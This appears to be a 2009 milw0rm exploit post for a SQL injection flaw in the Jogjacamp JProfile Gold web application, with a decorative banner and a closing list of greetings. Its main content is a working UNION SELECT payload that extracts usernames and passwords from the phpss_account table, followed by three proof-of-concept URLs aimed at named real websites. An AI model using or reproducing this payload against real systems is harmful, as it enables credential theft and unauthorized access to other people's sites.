############################################################### __ |__|__ ________ ____ ___________ ______ _ __ | | | \____ \_/ __ \ _/ ___\_ __ \_/ __ \ \/ \/ / | | | / |_> > ___/ \ \___| | \/\ ___/\ / /\__| |____/| __/ \___ > \___ >__| \___ >\/\_/ \______| |__| \/ \/ \/ ############################################################### Jogjacamp JProfile Gold SQL Injection by kecemplungkalen Vendor : http://jogjacamp.com bugs : /index.php?action=news.detail&id_news= exploit : union select concat(username,0x3a,password),2,3 from phpss_account-- POC : http://www.titiandamai.org/index.php?action=news.detail&id_news=6%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- http://www.ligaindonesia.com/index.php?action=news.detail&id_news=1976%20%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- http://hermawan.net/index.php?action=news.detail&id_news=42%20union%20select%20concat(username,0x3a,password),2,3%20from%20phpss_account%20-- ############################################################### greetz : Allah s3t4n and Paman aka Jack- my family and all Mainhack BrotherHood jupe crew jangan ngegame melulu :p # milw0rm.com [2009-03-03]